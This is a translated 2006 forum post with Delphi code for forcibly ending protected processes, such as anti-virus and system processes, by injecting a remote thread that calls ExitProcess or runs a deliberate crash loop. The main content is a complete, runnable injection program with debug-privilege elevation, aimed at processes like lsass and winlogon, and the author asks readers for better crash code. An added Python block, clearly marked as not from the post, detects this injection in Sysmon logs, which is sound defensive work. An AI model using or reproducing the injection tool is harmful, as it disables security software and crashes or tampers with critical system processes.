[Paste From DFW] Remote brute-force cracking, alternative way to end the process (insert a Program)

Source: Internet
Author: User
Author: Stake
Title: [Original] Remote brute-force cracking, alternative way to terminate the process (insert a Program)
Keywords: End Process, cracking
Category: Personal Zone
Confidentiality level: Public


The old way to end a process is OpenProcess, then TerminateProcess. However, if you run into programs that hook TerminateProcess, or kernel-mode programs (such as many anti-virus products), you are powerless: the end result of TerminateProcess is either no change at all, or your own program dies outright...

I have long thought about using other methods to end a process, for example getting myself to run in kernel mode... Here is a very simple way to remotely crack the target program. To put it bluntly, it inserts a thread into the target program that executes a piece of crash code, letting the target die from the inside. It is like throwing a bomb inside the target, hence the name remote cracking.

Implementation principle:
1. First, how to crash the target program. I have run into program crashes before. Do you still remember how to write that code? (Who would remember code that crashes on purpose?) I don't know how to write it either, so let me tell you the simplest way: replace the start address passed to CreateRemoteThread with 0 directly, so it tries to read and write the memory at address 0. The result is the familiar 'The instruction at "0x00000000" referenced memory at "0x00000000". The memory could not be "read".' That is the goal. But to be safe, it is better to write a piece of code that is guaranteed to crash. After all, that is more reliable.
In fact, the target program can be terminated without such violence. Do you still remember ExitProcess? That exit API that supposedly can only be used in your own program: just inject its address, $7c81caa2 (for details, see below). This is like handing someone else a knife and letting him commit suicide...

2. There are many examples of injecting threads, so they are skipped here. Note that for processes in kernel mode, CreateRemoteThread cannot be run from the same level. In addition, it is best to elevate to the debug privilege; otherwise don't expect remote injection to work.

Program implementation: (all code is on the second floor)
1. EnabledDebugPrivilege(True); // elevate to the debug privilege (copied code)

2. Get the process ID and put it in SC_pID.
hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {allow remote thread creation}
  PROCESS_VM_OPERATION + PROCESS_VM_WRITE, {allow remote VM operations + allow remote VM write}
  False, SC_pID);

3. Get the ExitProcess address: ($7c81caa2 under XP)
pfnStartAddr := GetProcAddress(GetModuleHandle('kernel32'), 'ExitProcess');

4. The old method: start the remote thread at $7c81caa2
hThread := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, nil, 0, TempVar);
Here we can also combine step 3 and step 4 to make it simpler. The second nil is the ExitProcess parameter; since we want to call ExitProcess(0) anyway, nil is passed.

After execution, we see that the doomed QQ closes silently, and so does Word, but lsass.exe is unaffected: ExitProcess gets no response at all. In this case, we can crack it directly.

5. Modify CreateRemoteThread
hThread := CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($0), Pointer($10000), 0, TempVar);
Target lsass.exe! Then up pops "lsass.exe - Application Error":
'The instruction at "0x00000000" referenced memory at "0x00000000". The memory could not be "read".' Then OpenProcess becomes invalid because lsass has been killed.

However, kernel-mode processes such as smss.exe cannot be handled directly with CreateRemoteThread. If hThread is not 0, run your program in kernel mode first.
As a result, winlogon.exe, spoolsv.exe and services.exe were also cracked. Then came the long-overdue blue screen...
Note: do not touch system processes. This is the lesson I learned in blood from a dozen reboots!

In this case, csrss.exe can read address 0 and will not die directly. So try implementing the crash code yourself, and let Windows tell us that "XXX has encountered a problem and needs to close. We are sorry for the inconvenience." Right! Other common methods include using VirtualAllocEx to open a large space in the target program and WriteProcessMemory to write into it, provided you have sufficient permissions.

The complete program code is provided below. Create a console program, paste in the code from the second floor, and run it!

2006-7-25 15:24:03
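What a defender would look for is the telemetry this procedure leaves behind. The following Python is an added example, not code from the post or its author: it models Sysmon Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread) records as constructed key=value lines, decodes the access mask that the OpenProcess call in step 2 requests, and flags remote threads whose start address is not backed by any loaded module (the stub written with VirtualAllocEx/WriteProcessMemory) or whose entry point is ExitProcess (step 4), correlating the two by source/target PID pair. The event line format, image paths and PIDs are constructed for the example; only the field names follow Sysmon's schema.

```python
import ntpath
import re

# Win32 process access rights, as defined in winnt.h.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
RIGHT_NAMES = {
    PROCESS_CREATE_THREAD: "PROCESS_CREATE_THREAD",
    PROCESS_VM_OPERATION: "PROCESS_VM_OPERATION",
    PROCESS_VM_READ: "PROCESS_VM_READ",
    PROCESS_VM_WRITE: "PROCESS_VM_WRITE",
    PROCESS_QUERY_INFORMATION: "PROCESS_QUERY_INFORMATION",
}
# The exact combination the post's OpenProcess call requests (0x2A).
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Processes the post names as targets: a foreign thread in these risks a
# blue screen (smss, csrss, winlogon) or credential exposure (lsass).
SENSITIVE = {"lsass.exe", "csrss.exe", "smss.exe", "winlogon.exe",
             "services.exe", "spoolsv.exe"}

# Constructed sample telemetry in a simplified key=value form. Field names
# follow Sysmon Event ID 10 (ProcessAccess) and 8 (CreateRemoteThread);
# "-" stands for a field Sysmon left empty. Paths and PIDs are made up.
SAMPLE_EVENTS = [
    r"EventID=10 SourceProcessId=1234 SourceImage=C:\tools\insertthreads.exe "
    r"TargetProcessId=680 TargetImage=C:\WINDOWS\system32\lsass.exe GrantedAccess=0x2A",
    r"EventID=8 SourceProcessId=1234 SourceImage=C:\tools\insertthreads.exe "
    r"TargetProcessId=680 TargetImage=C:\WINDOWS\system32\lsass.exe "
    r"StartAddress=0x00320000 StartModule=- StartFunction=-",
    r"EventID=8 SourceProcessId=1234 SourceImage=C:\tools\insertthreads.exe "
    r"TargetProcessId=2048 TargetImage=C:\QQ\QQ.exe "
    r"StartAddress=0x7C81CAA2 StartModule=C:\WINDOWS\system32\kernel32.dll StartFunction=ExitProcess",
    # Benign: a query-only handle from Task Manager, and a process opening itself.
    r"EventID=10 SourceProcessId=900 SourceImage=C:\WINDOWS\system32\taskmgr.exe "
    r"TargetProcessId=680 TargetImage=C:\WINDOWS\system32\lsass.exe GrantedAccess=0x1400",
    r"EventID=10 SourceProcessId=3000 SourceImage=C:\WINDOWS\system32\svchost.exe "
    r"TargetProcessId=3000 TargetImage=C:\WINDOWS\system32\svchost.exe GrantedAccess=0x1FFFFF",
]


def parse_event(line):
    """Parse one constructed key=value line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def decode_access(mask):
    """Name the access-right bits set in a GrantedAccess mask."""
    return [name for bit, name in RIGHT_NAMES.items() if mask & bit]


def analyze(lines):
    """Return findings for injection-capable handles and suspicious remote threads.

    A CreateRemoteThread finding is marked correlated when the same source PID
    earlier obtained an injection-capable handle to the same target PID.
    """
    findings = []
    armed = set()  # (source pid, target pid) pairs holding an injection-capable handle
    for ev in map(parse_event, lines):
        if ev["SourceProcessId"] == ev["TargetProcessId"]:
            continue  # a process touching itself is routine
        pair = (ev["SourceProcessId"], ev["TargetProcessId"])
        target = ntpath.basename(ev["TargetImage"]).lower()
        severity = "high" if target in SENSITIVE else "medium"
        if ev["EventID"] == "10":
            mask = int(ev["GrantedAccess"], 16)
            # Parentheses matter: in Python '==' binds tighter than '&'.
            if (mask & INJECT_MASK) == INJECT_MASK:
                armed.add(pair)
                findings.append({"event": "ProcessAccess", "target": target,
                                 "severity": severity, "rights": decode_access(mask)})
        elif ev["EventID"] == "8":
            reasons = []
            if ev.get("StartModule", "-") == "-":
                reasons.append("start address not backed by any loaded module")
            if ev.get("StartFunction") == "ExitProcess":
                reasons.append("thread entry is ExitProcess")
            if int(ev["StartAddress"], 16) == 0:
                reasons.append("start address is 0")
            if reasons:
                findings.append({"event": "CreateRemoteThread", "target": target,
                                 "severity": severity, "reasons": reasons,
                                 "correlated": pair in armed})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The three findings this produces are the handle to lsass.exe with exactly the rights the post requests, the unbacked thread in lsass.exe (correlated with that handle), and the ExitProcess thread in QQ.exe; the query-only handle and the self-access are ignored. In a real pipeline the same rules apply to Sysmon's XML or EVTX output, with the key=value parser swapped for the event reader.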


15:42:25 Complete InsertThreads.dpr

program InsertThreads;
{If you have not understood the entire program, keep the following information:
 Remote process blasting by Stake
 Original post address: http://www.delphibbs.com/keylife/iblog_show.asp?xid=23375
}
{$APPTYPE CONSOLE}
uses
  SysUtils, Windows;

var
  inputs: string;
  SC_pID: Integer;
  TempVar: Cardinal;
  hRemoteProcess, hThread: THandle;
  d_Proc_Addr, pfnStartAddr: Pointer;

// Code to be injected into the remote process; running it makes the target crash.
procedure kemThreads();
asm
  push 0
  pop eax                   // clear eax
  mov esi, eax              // esi, edi to zero
  mov edi, eax
@Loop:
  mov dword ptr [eax], eax  // write memory starting at address 0; the access fault ends the process
  add eax, 4
  jmp @Loop
end;

// Privilege-elevation function, copied code
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
  hToken: THandle;
  tp: TOKEN_PRIVILEGES;
  a: DWORD;
const
  SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
  Result := False;
  if OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken) then
  begin
    tp.PrivilegeCount := 1;
    LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
    if bEnabled then
      tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
    else
      tp.Privileges[0].Attributes := 0;
    a := 0;
    AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
    Result := GetLastError = ERROR_SUCCESS;
    CloseHandle(hToken);
  end;
end;

begin
  EnabledDebugPrivilege(True); // privilege elevation

  Write('Enter the target process PID: '); Readln(inputs);
  SC_pID := StrToInt(inputs);
  hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {allow remote thread creation}
    PROCESS_VM_OPERATION + PROCESS_VM_WRITE, {allow remote VM operations + allow remote VM write}
    False, SC_pID);
  // Check hRemoteProcess to see whether OpenProcess succeeded..

  // Reserve a memory region of $1000 bytes in the target
  d_Proc_Addr := VirtualAllocEx(hRemoteProcess, nil, $1000, MEM_COMMIT, PAGE_READWRITE);

  // Copy the kemThreads() function into it
  if not WriteProcessMemory(hRemoteProcess, d_Proc_Addr, @kemThreads, $800, TempVar) then
    Writeln('WriteProcessMemory: writing to the target process failed.')
  else
  begin
    {Commented out here; demonstrates how to find the 'ExitProcess' address
    // Find the function address
    // ExitProcess (kernel32) $7C81CAA2
    // MessageBoxA (user32) $77D504EA
    pfnStartAddr := GetProcAddress(GetModuleHandle('kernel32'), 'ExitProcess');
    Write(Format('function address: $%0.8x', [Integer(pfnStartAddr)]));
    }
    Writeln(''); TempVar := 0;
    // Writeln(Format('data written at: %0.8x', [Integer(d_Proc_Addr)]));

    // Write complete, execute
    // hThread := CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($0), Pointer($10000), 0, TempVar); // this line is the zero-address brute force from step 5
    hThread := CreateRemoteThread(hRemoteProcess, nil, 0, d_Proc_Addr, nil, 0, TempVar); // run the kemThreads() function that was written in
    if hThread = 0 then Writeln('CreateRemoteThread: failed to start the remote thread.');
  end;

  Write('Execution completed'); Readln(inputs); // press Enter to end
  // VirtualFreeEx(hRemoteProcess, d_Proc_Addr, $1000, MEM_DECOMMIT);
  CloseHandle(hRemoteProcess);
end.


15:43:03 Attached the most streamlined ExitProcess method (but it often cannot actually end the process...)

var
  inputs: string;
  SC_pID: Integer;
  TempVar: Cardinal;
  hRemoteProcess, hThread: THandle;
begin
  EnabledDebugPrivilege(True); // privilege elevation
  SC_pID := {target process ID};
  hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + PROCESS_VM_OPERATION + PROCESS_VM_WRITE, False, SC_pID);
  hThread := CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($7C81CAA2), nil, 0, TempVar);
  Writeln('Thread inserted, ThreadID ' + IntToStr(TempVar));
  // CloseHandle(hRemoteProcess);
end;


2006-7-25 15:55:22

The above ExitProcess method is the simplest API call; just put it on a button. Make sure to change SC_pID := {target process ID};!

The section above,
procedure kemThreads();
asm
  push 0
  pop eax                   // clear eax
  mov esi, eax              // esi, edi to zero
  mov edi, eax
@Loop:
  mov dword ptr [eax], eax  // write memory starting at address 0, then exit with an error
  add eax, 4
  jmp @Loop
end;
is not the best. Maybe you can find more effective crash code. If you have any better ideas, please remember to reply!
I am now studying "Writing Secure Code (2nd edition)". If I find more malicious code, I will post it right away!

(With the crash code above, tested in a VMware virtual machine: after injecting smss.exe, an immediate blue screen.
After injecting winlogon.exe, I was surprised to find that the Shut Down button disappears and only Log Off is left in the Start Menu; the options in Task Manager are all greyed out.
Injecting lsass.exe does no apparent harm: the "shutdown" dialog box appears. After cancelling it with shutdown /a, half a minute later comes a blue screen, unknown hard error...)
